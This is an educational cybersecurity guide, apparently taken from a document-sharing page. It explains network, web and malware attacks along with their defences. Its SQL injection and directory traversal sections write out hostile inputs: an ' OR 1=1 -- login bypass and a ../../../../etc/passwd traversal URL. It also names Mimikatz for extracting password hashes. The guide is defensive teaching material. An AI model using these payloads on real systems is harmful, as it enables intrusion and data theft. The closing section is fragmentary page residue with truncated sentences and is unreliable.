Address Resolution Protocol (ARP) Spoofing
ARP Spoofing, also known as ARP poisoning, involves an attacker forging

ARP messages to associate their MAC address with the IP address of a
legitimate network device. This allows the attacker to intercept and modify
network traffic, potentially leading to man-in-the-middle attacks or denial of
service.
To defend against ARP spoofing, organizations can employ dynamic ARP

inspection, static ARP entries, and intrusion detection systems that monitor
for unusual ARP activity.
In summary, spoofing attacks can impact various aspects of digital

communication, whether it be IP-based, email, phone, or network traffic. To
protect against spoofing, be vigilant and employ defensive measures, such
as network authentication protocols, monitoring suspicious activities, and
educating users about potential risks.
28
Philipp Bùi Đỗ
Deauth Attack
A Deauthentication (Deauth) Attack is a type of Denial-of-Service (DoS)
attack that specifically targets wireless networks. It works by exploiting how
Wi-Fi devices communicate with one another, intentionally causing legitimate
users to be disconnected from the access point. The attacker sends a flood
of deauthentication (Deauth) frames to the targeted access point, effectively
overwhelming it and forcing connected clients to disconnect.
How Does a Deauth Attack Work?
Deauth attacks take advantage of the management frames used in the

802.11 Wi-Fi standard. These control frames ensure efficient operation of
communications between connected devices and include the authentication,
association, and deauthentication subtypes. Since management frames are
often not encrypted, attackers can easily generate and transmit fake
deauthentication frames to force disconnections.
When a Deauth frame is received by a user’s device, it releases its

connection to the access point, and the user must re-connect in order to
reestablish data transfer with the Wi-Fi network.
Impacts and Consequences
Deauth attacks can cause the following problems:
 Loss of connectivity: The most obvious consequence is that network

connectivity is lost, disrupting any network-related activity and
potentially causing loss of unsaved data.
 Network congestion: As deauthenticated devices try to reconnect,

this increased activity can cause network congestion, leading to further
performance degradation.
 Credentials theft: Deauth attacks can be used in conjunction with

fake access points, allowing attackers to trick users into connecting to
these malicious networks, and subsequently stealing their credentials
and sensitive data.
How to Prevent Deauth Attacks
There isn’t a foolproof solution to protect against deauth attacks, particularly

due to the inherent lack of encryption in management frames. However, you
can take the following steps to reduce your risk:
29
Philipp Bùi Đỗ
 Enable 802.11w (Protected Management Frames): Some routers

support the 802.11w standard, which can protect deauthentication and
disassociation frames through encryption.
 Use a strong authentication method: Enabling strong methods like

WPA3 and EAP-TLS on your network can help ensure that devices are
more resistant to malicious disconnections.
 Monitor your network for suspicious activity: Utilize a network

monitoring tool or Wi-Fi analyzer to detect anomalies and possible
deauth attack attempts.
 Secure your access points: Regularly update your router’s firmware

and configure its settings to disable remote management access,
applying strong access credentials to minimize unauthorized access.
As an author of this guide, I advise you to stay diligent and follow the best
practices in order to safeguard your network from deauth attacks and other
security threats.
VLAN Hopping
VLAN hopping is a common network-based attack that exploits the
vulnerabilities of the VLAN trunking protocols in a local area network (LAN).
The objective of this attack is to gain unauthorized access to other VLANs or
to bypass the network’s security protocols by hopping between VLANs.
How VLAN Hopping Works
There are two primary methods of VLAN hopping:
 Switch Spoofing: In this approach, an attacker configures their

device to act as a switch and establish a trunk link with the actual
network switch. Since trunk links are designed to carry traffic from
multiple VLANs, the attacker can then access traffic from all the VLANs
that are allowed on the trunk.
 Double Tagging: This method involves sending frames with multiple

802.1Q VLAN tags. By adding an extra tag, an attacker can confuse
the switch and cause it to forward the frame to another VLAN,
providing unauthorized access to that VLAN’s traffic.
Preventing VLAN Hopping

30
Philipp Bùi Đỗ
To secure your network from VLAN hopping attacks, consider implementing

the following best practices:
 Disable Unused Ports: Shut down any unused ports on your

switches and configure them as access ports instead of trunk ports.
This will limit the opportunity for an attacker to establish a trunk link.
 Configure Allowed VLANs on Trunk Links: Restrict the VLANs that

can be carried on trunk links by explicitly specifying the allowed
VLANs. This will prevent an attacker from accessing unauthorized
VLANs through a trunk link.
 Implement VLAN Access Control Lists (VACLs): VACLs can be

used to filter traffic at the VLAN level, preventing unauthorized traffic
from entering or leaving a VLAN.
 Enable 802.1Q Native VLAN Tagging: By enabling native VLAN

tagging and assigning a unique, unused VLAN ID as the native VLAN,
you can prevent double tagging attacks.
Remember that implementing these security practices is crucial in protecting

your network from VLAN hopping and other types of network-based attacks.
Always stay vigilant and keep your network’s security protocols up-to-date to
minimize the chances of a successful cyber attack.
Rogue Access Point

A Rogue Access Point (RAP) is an unauthorized wireless access point that
is installed or connected to a network without the network administrator’s
consent. These access points can be set up by attackers to exploit security
vulnerabilities within the network or by employees for personal usage. RAPs
can lead to several network-based attacks, causing severe damage to an
organization’s security.
Risks Associated with Rogue Access Points
 Unauthorized Access: Attackers can use RAPs to gain unauthorized

access to a victim’s sensitive data.
 Man-in-the-Middle Attacks: Cybercriminals can intercept or alter

the communication between two parties using RAPs, performing a
Man-in-the-Middle attack.
31
Philipp Bùi Đỗ
 Information Theft: By monitoring the traffic passing through a RAP,

attackers can steal sensitive information such as usernames,
passwords, and credit card information.
 Network Vulnerabilities: RAPs can create new security holes

because they often bypass security measures such as firewalls,
intrusion detection systems, and VPNs.
Detecting and Preventing Rogue Access Points
Here are some measures to help detect and prevent rogue access points:
 Wireless Intrusion Detection Systems (WIDS): WIDS helps

identify and locate unauthorized access points, clients and ad-hoc
connections in an organization’s wireless network.
 Regular Network Scans: Perform regular network scans to detect

any unauthorized devices connected to the network.
 Network Access Control (NAC): Implement Network Access Control

to restrict unauthorized devices from accessing the internal network.
 Encryption and Authentication: Apply strong encryption and

authentication protocols such as WPA3, to reduce the chances of
unauthorized devices connecting to the network.
 User Awareness: Educate employees about the risks associated with

rogue access points and how to avoid unintentionally installing them.
By staying vigilant and implementing robust security measures,

organizations can reduce the risks associated with rogue access points and
protect their networks from potential cyberattacks.
War-driving/dialing
War Driving
War driving is a technique in which an attacker physically drives around

attempting to discover open or poorly secured wireless networks. This
practice allows the attacker to exploit network vulnerabilities and gain
unauthorized access to sensitive information. The goal of war driving is to
identify targets, typically homes, offices, or businesses, with WLANs.
Key elements of War Driving

32
Philipp Bùi Đỗ
 Detection: War driving begins with the detection of nearby wireless

access points using laptops, mobile devices, or any device with WiFi
scanning capabilities.
 Mapping: After detecting the wireless signals, the attacker maps them
using GPS or other location-based services.
 Analysis: Once the target is identified, the attacker analyzes the

network security to find the weakness and vulnerabilities.
 Exploitation: Finally, the attacker exploits the discovered

vulnerabilities to gain unauthorized access to the network.
War Dialing
War dialing is a similar attack method but involves calling numerous phone
lines in search of modems and fax machines. War dialing allows the attacker
to identify insecure phone lines and unauthorized access points.
Key elements of War Dialing
 Detection: War dialing starts by automating the process of calling a

range of phone numbers using software, searching for modem or fax
machine-tones.
 Mapping: The attacker collects the list of phone numbers that

responded with an appropriate connection tone.
 Analysis: The attacker will analyze the phone lines to assess their
security and vulnerabilities.
 Exploitation: The attacker exploits the discovered vulnerabilities to

gain unauthorized access to the systems connected to the modems or
fax machines.
Prevention Strategies
To protect your network against war driving or war dialing, it’s important to:
 Implement strong security measures such as WPA3 or WPA2-

Enterprise for WiFi networks.
 Employ proper firewall configurations.
 Disable broadcasting your SSID (network name) to make your WiFi

network invisible to casual passersby.
33
Philipp Bùi Đỗ
 Use strong authentication methods for remote access systems.
 Regularly update your network devices with the latest security

patches.
 Periodically conduct vulnerability assessments to stay ahead of

potential weaknesses.
 Educate employees and users about the risks of unsecured networks

and the importance of following security guidelines.
Buffer Overflow
A buffer overflow is a common type of cybersecurity vulnerability that occurs
when a program writes or reads more data than the fixed-size buffer can
hold, resulting in the data to overwrite other data in memory. The overflow
can cause data corruption and lead to unexpected behavior, such as
application crashes or even the execution of malicious code.
Causes of Buffer Overflow
Buffer overflow vulnerabilities are usually caused by:
 Insufficient input validation: The program doesn’t properly validate the

length of the input before writing it into the buffer.
 Off-by-one errors: The code uses an incorrect boundary condition,

leading to one extra byte being written outside the buffer.
 Integer overflows: The buffer size is calculated using an integer

variable that is too small to represent the required size.
Exploitation
Attackers can exploit buffer overflow vulnerabilities to:
 Crash the application, causing a denial of service (DoS).
 Overwrite critical data or control structures, causing the application to

behave unexpectedly.
 Inject and execute malicious code, compromising the security of the

system.
Prevention Techniques
34
Philipp Bùi Đỗ
To prevent and mitigate buffer overflow vulnerabilities, the following

strategies can be employed:
 Perform thorough input validation and sanitize all inputs to the

program.
 Use safe APIs and libraries that check the size of the data before
copying it into the buffer.
 Apply proper boundary checks and use modern programming

languages with memory protection features.
 Enable compiler protections such as stack canaries and address space

layout randomization (ASLR).
 Regularly scan code for vulnerabilities and conduct security audits.
By being aware of buffer overflow vulnerabilities and implementing these

preventive strategies, you can protect your software from potential attacks
and keep your systems secure.
Memory Leak
A memory leak occurs when a program or application allocates memory but
fails to release it back to the system when it is no longer needed. This can
lead to an accumulation of memory resources that are not in use, ultimately
causing a system’s performance to degrade or even crash as the available
memory resources become exhausted.
Causes of Memory Leaks
Memory leaks can occur due to various reasons such as:
 Programming Errors: Memory leaks mainly result from errors in the

program’s source code, such as improper handling or deallocation of
memory resources.
 Library or Framework Bugs: Sometimes, the libraries or

frameworks used by an application may contain memory leaks within
their implementation.
 Operating System or Hardware Bugs: Certain bugs in the

operating system or hardware may also cause memory leaks.
Effects of Memory Leaks

35
Philipp Bùi Đỗ
Memory leaks can have several negative consequences on system

performance and stability, including:
 Performance Degradation: As the system runs out of available

memory, it may become slow and unresponsive, leading to a poor user
experience.
 System Crashes: In extreme situations, a memory leak may cause

the system to run out of memory altogether, forcing it to crash or
reboot.
 Resource Exhaustion: Applications suffering from memory leaks

may lead to a gradual depletion of system resources, which can then
impact the performance of other applications running on the same
system.
Detecting Memory Leaks
There are several techniques to detect memory leaks:
 Static Code Analysis: This method involves analyzing the source

code of an application to identify any potential memory leak issues.
 Runtime Analysis: Runtime analysis tools, also known as memory

profilers, can monitor an application’s memory usage during execution
and identify leaks in real-time.
 Testing & Monitoring: Rigorous testing and continuous monitoring of

applications can help detect memory leaks as well as performance
issues due to resource contention or exhaustion.
Preventing Memory Leaks
To mitigate the risk of memory leaks:
 Follow Best Practices: By following coding best practices and

guidelines, developers can minimize the occurrence of memory leaks
in their applications.
 Code Reviews: Regularly reviewing the code for potential memory

management issues can help identify and fix memory leaks early in
the development process.
 Utilize Garbage Collection: Choosing programming languages or

frameworks that support automatic garbage collection can help
36
Philipp Bùi Đỗ
manage memory resources more effectively and prevent memory

leaks.
Always remember, addressing memory leaks promptly is crucial in

maintaining a secure and efficient computing environment.
XSS
Cross-site scripting (XSS) is a type of cybersecurity vulnerability commonly
found in web applications. It occurs when an attacker injects malicious
scripts into webpages viewed by other users. These scripts can be used to
steal sensitive information, such as user credentials or sensitive data. XSS
vulnerabilities can lead to various consequences, like account takeover,
phishing attacks, and other malicious activities.
There are three main types of XSS attacks:
 Stored XSS Attacks: In this type, the malicious script is stored on

the web server, typically through user input fields like comments or
posts. When other users visit the affected page, their browsers will
execute the malicious script.
 Reflected XSS Attacks: Here, the attacker sends a malicious URL

containing the script to unsuspecting users. When they click the link,
their browsers execute the malicious script, which can steal sensitive
information or perform unauthorized actions.
 DOM-based XSS Attacks: In these cases, the attacker manipulates

the Document Object Model (DOM) of a webpage in the user’s browser,
causing the malicious script to be executed. This method does not
involve direct interaction with the webserver.
Preventing XSS Attacks
To protect your web applications from XSS attacks, consider implementing

the following best practices:
 Input Validation: Validate and sanitize user inputs to ensure that

they only contain acceptable data. Reject any inputs that contain
malicious codes or unexpected characters.
37
Philipp Bùi Đỗ
 Output Encoding: Encode your application’s outputs properly, so

special characters are displayed in a way that prevents script
execution.
 Content Security Policy (CSP): Implement a strict CSP, which

serves as a layer of defense against XSS by specifying the sources of
allowed scripts and other file types that can be executed by the
browser.
 Secure HTTP Headers: Set secure values for HTTP headers, such as
X-XSS-Protection, X-Content-Type-Options, X-Frame-Options, and X-
Content-Security-Policy, to prevent common XSS attack vectors.
 Regular Security Testing: Perform regular security audits and

penetration tests to identify and fix any vulnerabilities in your web
applications.
Remember, XSS vulnerabilities pose a significant risk to user privacy and

web application security. By following these best practices, you can build a
robust defense against cross-site scripting attacks and keep your users’
sensitive data protected.
SQL Injection
SQL Injection is a type of cyber attack that targets web applications and
databases. This technique takes advantage of vulnerabilities in the
application’s code by injecting malicious SQL statements and exploiting them
to gain unauthorized access or to manipulate the data in a database.
Attackers can potentially use this technique to retrieve, modify, delete, or
even add data to the database without proper authorization.
How SQL Injection Works
SQL Injection works by identifying input fields in a web application, such as

text boxes or URL parameters, and testing whether these fields are
vulnerable to SQL code injection. When an attacker identifies a vulnerable
input field, they inject SQL code to manipulate the underlying SQL query or
to execute additional queries on the database.
For example, consider a web application that allows users to log in by

providing a username and password. The application might use the following
SQL query to authenticate the user:
38
Philipp Bùi Đỗ
SELECT * FROM users WHERE username = '$username' AND password =

'$password'
In this case, $username and $password are replaced with the values
provided by the user. If an attacker enters the following input for the
username field, they can manipulate the query to bypass the password
check:
' OR 1=1 --
The resulting query would look like:
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password =
'$password'
As 1=1 is always true, the query returns a result, and the attacker gains
Preventing SQL Injection Attacks
To protect your web applications from SQL Injection attacks, you should:
 Use Parameterized Queries and Prepared Statements: These

techniques separate user input from the SQL query, making it harder
for an attacker to inject malicious code. Most modern web
development frameworks and database libraries support parameterized
queries and prepared statements.
 Validate User Input: Always validate and sanitize user input before
incorporating it into a SQL query. Use strict data types and validate
input against predefined patterns or value ranges.
 Limit Database Permissions: Limit the privileges of the database

accounts used by your web applications. This confines the potential
damage if an attacker manages to perform an SQL injection attack.
 Keep Software Up-to-Date: Regularly update your web application

software and database management systems to ensure that you are
protected against known vulnerabilities.
By understanding SQL Injection attacks and employing the best practices to

prevent them, you can safeguard your web applications and secure your
sensitive data from malicious actors.
39
Philipp Bùi Đỗ
CSRF
Cross-Site Request Forgery, or CSRF, is a type of attack that exploits the
trust that a user’s browser has in a web application. It tricks the user’s
browser into executing unwanted actions on a web application in which the
user is currently authenticated.
How CSRF Works
 A user logs into a vulnerable web application.
 The web application returns a cookie to the user’s browser, indicating

that the user is authenticated.
 The attacker creates a malicious link or embeds malicious

HTML/JavaScript code on another website.
 The user, while still authenticated to the web application, visits the
attacker’s website, which triggers the malicious code.
 The attacker’s code sends a request to the targeted web application,

leveraging the user’s authenticated cookie.
 The vulnerable web application performs the malicious action as if the

request came from the user.
Impact of CSRF Attacks
CSRF attacks can result in unauthorized actions being performed on a user’s

behalf, often without the user’s knowledge. Consequences might include
unauthorized:
 Data modifications
 Privilege escalation
 Account takeovers
Prevention Measures
Here are some techniques to help prevent CSRF attacks:
 Use CSRF Tokens: Implement a unique, unpredictable token in each

sensitive request (e.g., form submissions) to ensure that the request
originates from the same domain.
40
Philipp Bùi Đỗ
 Double-submit Cookies: Generate a unique token for each session

and include it as a hidden value in forms, then validate it against the
corresponding session cookie.
 SameSite Cookies: Use the SameSite attribute in cookies to instruct

the browser to only send the cookie when the request originates from
the same domain.
 Content Security Policy (CSP): Implement a CSP header to mitigate

cross-site scripting, which can be a vector for CSRF attacks.
 Restrict CORS: Limit Cross-Origin Resource Sharing (CORS) to

trusted domains to prevent unauthorized communication between
different origins.
By understanding and applying these preventive measures, the risk of CSRF

attacks can be significantly reduced, enhancing the overall safety and
security of web applications.
Replay Attack
A Replay Attack is a malicious action where an attacker intercepts data
transmitted between two parties, records the data, and retransmits it at a
later time to create unauthorized access or gain some benefit. This type of
attack happens when the data sent by the original sender is not altered in
any way but simply replayed, making the system think that it is receiving a
legitimate request.
How Does a Replay Attack Work?
Replay attacks work by the following process:
 The attacker intercepts communication between two parties (e.g., a

user authenticating with a server).
 The attacker records the intercepted data, such as login credentials or

session tokens.
 The attacker retransmits the recorded data to the target system at a

later time, fooling the system into thinking that it is a legitimate
request from the original sender.
Risks and Consequences
41
Philipp Bùi Đỗ
Some potential risks and consequences of replay attacks include:
 Unauthorized access: An attacker can gain access to the target system

using replayed credentials or session tokens.
 Data theft: The attacker may steal sensitive data by impersonating a

legitimate user.
 Financial fraud: In the case of online transactions, an attacker could

potentially replay a transaction, causing the victim to pay for the same
item or service multiple times.
Prevention Techniques
To prevent replay attacks, consider the following measures:
 Timestamps: Include a timestamp in the data being transmitted, and

have the receiving system verify that it is receiving the request within
a pre-determined time window.
 Nonces: Use a unique, one-time number (nonce) in each transmitted

message. The receiving party should check for duplicate nonces to
ensure that the message has not been replayed.
 Session management: Implement proper session management

policies, such as setting timeouts and regularly renewing session
tokens.
 Encryption: Use strong, end-to-end encryption for data being

transmitted between parties. This prevents an attacker from
intercepting and reading the data.
 Message authentication: Implement message authentication

mechanisms, such as digital signatures or Message Authentication
Codes (MAC), to ensure the integrity of the transmitted data.
Understanding and implementing these prevention techniques will help

alleviate the risks associated with replay attacks and enhance the overall
security of your system.
Pass the Hash

Pass the hash (PtH) is a type of cyber attack that enables an attacker to
authenticate to remote systems by using the underlying NTLM or LanMan
42
Philipp Bùi Đỗ
hash of a user’s password, rather than requiring the plaintext password

itself. This type of attack exploits the fact that a password hash can be used
for authentication instead of the actual password, giving an attacker access
to a user’s account without the need to crack the password itself.
How does Pass the Hash work?
 Initial compromise: The attacker first compromises a single

workstation or user account on the target network. This can be done
via social engineering, phishing, exploiting software vulnerabilities, or
other methods.
 Hash extraction: Once the attacker gains access to the compromised

system, they are able to extract the password hashes of users stored
in the system. Tools like Mimikatz, Windows Credential Editor, or
PowerShell scripts can be used to obtain these hashes.
 Lateral movement: The attacker then leverages the extracted

password hashes to access other systems and services within the
network. This is done by using the PtH technique to bypass
authentication mechanisms and impersonate legitimate users. The
attacker continues to search for and collect additional password
hashes, looking for privileged account hashes that can grant them
further access.
 Privilege escalation: The attacker uses the stolen privileged account

hashes to gain increased permissions on the network. This can lead to
the attacker gaining control over critical systems, allowing them to
exfiltrate sensitive data or even create backdoors for future attacks.
Mitigation Strategies
To defend against pass the hash attacks, organizations should implement a

combination of the following measures:
 Network segmentation: Divide the network into separate segments,

restricting access to sensitive systems and limiting unauthorized lateral
movement.
 Multi-factor authentication (MFA): Implement MFA for user

accounts, particularly for administrator accounts, to make it more
difficult for an attacker to authenticate using stolen hashes.
43
Philipp Bùi Đỗ
 Strong password policies: Enforce strong, unique passwords to

make it harder for attackers to crack hashes or gain unauthorized
access.
 Least privilege principle: Limit user account privileges and ensure

that users only have the permissions necessary for their job roles.
 Credential Guard: Use Windows Credential Guard or similar security

features on supported operating systems to protect stored credentials
and limit the risk of hash extraction.
 Regular monitoring and auditing: Continuously monitor and audit

user activities, access logs, and system security to detect and prevent
unauthorized access or suspicious activity.
Directory Traversal
Directory traversal, also known as path traversal, is a type of cyber attack
that allows an attacker to access restricted files and directories on a server,
usually with the goal of obtaining sensitive information. This vulnerability
occurs when user input is not adequately validated and the attacker can
manipulate it to traverse the server directory structure.
How it Works
In a directory traversal attack, the attacker attempts to exploit an input field

(e.g., a file or image upload form, URL parameters, etc.) that takes a file
path as input. By supplying specially crafted input, an attacker can
manipulate the server into providing access to unauthorized files and
directories.
For example, consider a web application that allows users to view the
contents of a specific file by specifying its path through a URL parameter,
such as:
https://www.example.com/file.php?path=/user/documents/report.pdf
In this case, an attacker could manipulate the path parameter to traverse

the server’s directories, like this:
https://www.example.com/file.php?path=../../../../etc/passwd
44
Philipp Bùi Đỗ
If the server doesn’t properly validate and sanitize the input, it might reveal
the contents of the /etc/passwd file, which contains sensitive information
about system users.
Mitigation Techniques
There are several methods to prevent directory traversal attacks:
 Input Validation: Ensure that user input is strictly validated and

sanitized. For example, one can check for the presence of special
characters (e.g., ’..’, ’/’, ”), disallowing them if found.
 Access Control: Implement proper access control mechanisms to

prevent unauthorized access to files and directories. For example, use
a whitelist approach to establish which files and directories the user is
allowed to access.
 Least Privilege: Practice the principle of least privilege by ensuring

that an application runs with only the necessary permissions needed
for its operation. This can minimize the potential impact of a directory
traversal attack.
 Use Chroot Jails: Deploy applications inside chroot jails to restrict

access to a certain directory, thwarting attempts to traverse outside
that directory.
By implementing these countermeasures, you can minimize the risk of

directory traversal attacks and help protect your system’s critical files and
directories.
Malware
Malware, short for malicious software, refers to any software intentionally
created to cause harm to a computer system, server, network, or user. It is a
broad term that encompasses various types of harmful software created by
cybercriminals for various purposes. In this guide, we will delve deeper into
the major types of malware and their characteristics.
Virus
A computer virus is a type of malware that, much like a biological virus,

attaches itself to a host (e.g., a file or software) and replicates when the
45
Philipp Bùi Đỗ
host is executed. Viruses can corrupt, delete or modify data, and slow down
system performance.
Worm
Worms are self-replicating malware that spread through networks without

human intervention. They exploit system vulnerabilities, consuming
bandwidth and sometimes carrying a payload to infect target machines.
Trojan Horse
A trojan horse is a piece of software disguised as a legitimate program but

contains harmful code. Users unknowingly download and install it, giving the
attacker unauthorized access to the computer or network. Trojans can be
used to steal data, create a backdoor, or launch additional malware attacks.
Ransomware
Ransomware is a type of malware that encrypts its victims’ files and

demands a ransom, typically in the form of cryptocurrency, for the
decryption key. If the victim refuses or fails to pay within a specified time,
the encrypted data may be lost forever.
Spyware
Spyware is a type of malware designed to collect and relay information

about a user or organization without their consent. It can capture
keystrokes, record browsing history, and access personal data such as
usernames and passwords.
Adware
Adware is advertising-supported software that automatically displays or

downloads advertising materials, often in the form of pop-up ads, on a user’s
computer. While not always malicious, adware can be intrusive and open the
door for other malware infections.
Rootkit
A rootkit is a type of malware designed to hide or obscure the presence of

other malicious programs on a computer system. This enables it to maintain
persistent unauthorized access to the system and can make it difficult for
users or security software to detect and remove infected files.
Keylogger
46
Philipp Bùi Đỗ
Keyloggers are a type of malware that monitor and record users’ keystrokes,
allowing attackers to capture sensitive information, such as login credentials
or financial information entered on a keyboard.
Understanding the different types of malware can help you better identify
and protect against various cyber threats. As the cyber landscape continues
to evolve, it’s essential to stay informed about emerging malware and equip
yourself with the necessary security skills and knowledge.
47

Summary of Cyber Attack Types

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Summary of Cyber Attack Types

Uploaded by

Copyright:

Available Formats

Philipp Bùi Đỗ

Summary of Cyber Attack Types

Phishing is an attempt to obtain sensitive information, such as login

How to protect yourself:

 Be cautious when opening emails from unknown senders

How to protect yourself:

 Be cautious when receiving unexpected phone calls, especially from

How to protect yourself:

 Be aware of the potential risks associated with a high-profile position

How to protect yourself:

 Be cautious when receiving unsolicited text messages, especially from

Spammers often use automated systems to send these messages to a large

 Suspicious sender addresses

To protect yourself from spam, you should:

 Set up effective email filters

Some common characteristics of spim messages include:

 Unknown or suspicious sender accounts

To protect yourself from spim, you should:

How Shoulder Surfing Occurs

 Direct observation: An attacker stands close to the target and

Preventing Shoulder Surfing

To protect yourself from shoulder surfing, follow these guidelines:

 Be aware of your surroundings, especially in public places where the

still contain sensitive information like usernames, passwords, credit card

 Implement a ‘shred-all’ policy: Ensure that all sensitive documents

 Raise awareness: Train employees to recognize the potential risks of

 Secure disposal: Use lockable bins and trash bags or dispose of

 Periodic audits: Conduct regular audits of your physical security

By implementing these countermeasures, your organization can significantly

 Target identification: The attacker chooses a target building, office,

 Observation: The attacker watches for patterns, studying employees’

 Entry: The attacker waits for a situation where an employee is

 Awareness training: Ensure that employees are aware of tailgating

 Physical security: Implement security measures like turnstiles,

 Access control: Ensure that access cards are unique to each

 Security culture: Build a strong security culture where employees

It is essential to keep in mind that tailgating relies heavily on human

particularly dangerous because it exploits a security gap that the vendor is

 Undetected vulnerability: Attackers target vulnerabilities in software

 Stealth: Attackers usually exploit these vulnerabilities quietly, making

Zero day attacks can have serious consequences, including:

 Data theft or loss

 Damaged systems or infrastructure

Organizations should invest in proactive security measures to protect against

 Keep software up-to-date: Regularly update software and apps, as

 Implement multi-layered security: Employ a combination of robust

 Monitor network and device activity: Regularly monitor and

 Encrypt sensitive data: By encrypting sensitive data, it becomes

 Segment networks: Segment your networks to limit access to

 Educate employees: Provide training for employees about the threat

 Regular backups and disaster recovery planning: Routinely and

Types of Social Engineering

There are various forms of social engineering, including:

 Phishing: A widespread technique where attackers create fake emails

 Pretexting: This method involves the attacker fabricating a believable

 Baiting: Tempting the victim with free or irresistible offers such as

 Quid pro quo: Offering a service, information, or assistance in

 Tailgating/piggybacking: Attacker gains unauthorized physical

To protect yourself and your organization against social engineering attacks,

 Educate employees about the various social engineering methods,

 Implement robust security protocols, including multi-factor

 Encourage a culture of verification and validation to ensure the

 Keep software and security solutions up-to-date to minimize

 Regularly back up data and have an incident response plan in place to